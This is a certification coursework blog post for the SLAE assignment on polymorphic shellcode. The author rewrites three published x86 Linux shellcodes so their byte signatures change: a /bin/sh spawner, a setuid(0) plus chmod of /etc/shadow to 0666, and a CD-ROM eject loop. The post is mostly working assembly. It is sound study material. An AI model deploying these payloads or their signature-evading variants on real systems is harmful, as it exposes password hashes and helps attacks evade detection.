Back to Posts

Share this post

SLAE – Assignment #6: Polymorphic Shellcode

Posted by: voidsec

Reading Time: 3 minutes

Assignment #6: Polymorphic Shellcode

Sixth SLAE’s assignment requires to create three different (polymorphic) shellcodes version starting from published Shell Storm’s examples.

I’ve decided to take this three in exam:

As always, all the code is also available on GitHub.

execve (“/bin/sh”)

Original:

; http://shell-storm.org/shellcode/files/shellcode-752.php

xor ecx, ecx
mul ecx
push ecx
push 0x68732f2f   ;; hs//
push 0x6e69622f   ;; nib/
mov ebx, esp
mov al, 11
int 0x80

Polymorphic:

; Paolo Stagno aka [VoidSec](https://voidsec.com)
; SLAE-1511
; mul: multiply eax value with arg  (ecx), result stored in eax,edx
xor ecx, ecx
mul ecx
push eax
mov edi, 0x68732f2f
mov esi, 0x6e69622f
push edi
push esi
mov ebx, esp
mov al, 0xb
int 0x80

Diff:

  • original size: 21 bytes
  • polymorphic size: 23 bytes [OK] (max size: 31.5 bytes)
  • +9.52%

setuid(0) + chmod(“/etc/shadow”,0666)

Original:

; http://shell-storm.org/shellcode/files/shellcode-624.php


xor    ebx, ebx
mov    al, 0x17
int    0x80
xor    eax,eax
push   eax
push   0x776f6461
push   0x68732f63
push   0x74652f2f
mov    ebx, esp
mov    cx, 0x1b6
mov    al, 0xf
int    0x80
inc    eax
int    0x80

Polymorphic:

; Paolo Stagno aka [VoidSec](https://voidsec.com)
; SLAE-1511

xor ebx, ebx
push 0x17
pop eax
int 0x80
xor eax,eax
push eax
mov eax, 0x776f6461
push eax
mov eax, 0x68732f63
push eax
mov eax, 0x74652f2f
push eax
mov ebx, esp
mov ecx, -219
add ecx, -219
mov eax, 0xffffffff
int 0x80
inc eax
int 0x80

Diff:

  • original size: 37 bytes
  • polymorphic size: 51 bytes [OK] (max size: 55.5 bytes)
  • +37.83%

open cd-rom loop (follows “/dev/cdrom” symlink)

Original:

; http://shell-storm.org/shellcode/files/shellcode-231.php


push 0x5 
pop eax 
xor ecx,ecx 
push ecx 
mov ch, 0x8 
push 0x6d6f7264 
push 0x632f7665 
push 0x642f2f2f 
mov ebx, esp 
int 0x80 
mov ebx, eax 
mov cx, 0x5309
 
openit:
 mov al, 0x36 
 int 0x80 
 jmp openit

Polymorphic:

; Paolo Stagno aka [VoidSec](https://voidsec.com)
; SLAE-1511

push 0x5 
pop eax
xor ecx,ecx 
push ecx
mov ch, 0x8 
mov edi, 0x6d6f7264
push edi
mov edi, 0x632f7665
push edi
mov edi, 0x642f2f2f
push edi
mov ebx, esp 
int 0x80
xchg eax, ebx
mov cx, 0x5309
openit:
 push 0x36
 pop eax 
 int 0x80 
 jmp openit

Diff:

  • original size: 39 bytes
  • polymorphic size: 42 bytes [OK] (max size: 58.5 bytes)
  • +7.69%

SLAE Exam Statement

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.

Student ID: SLAE-1511

Back to Posts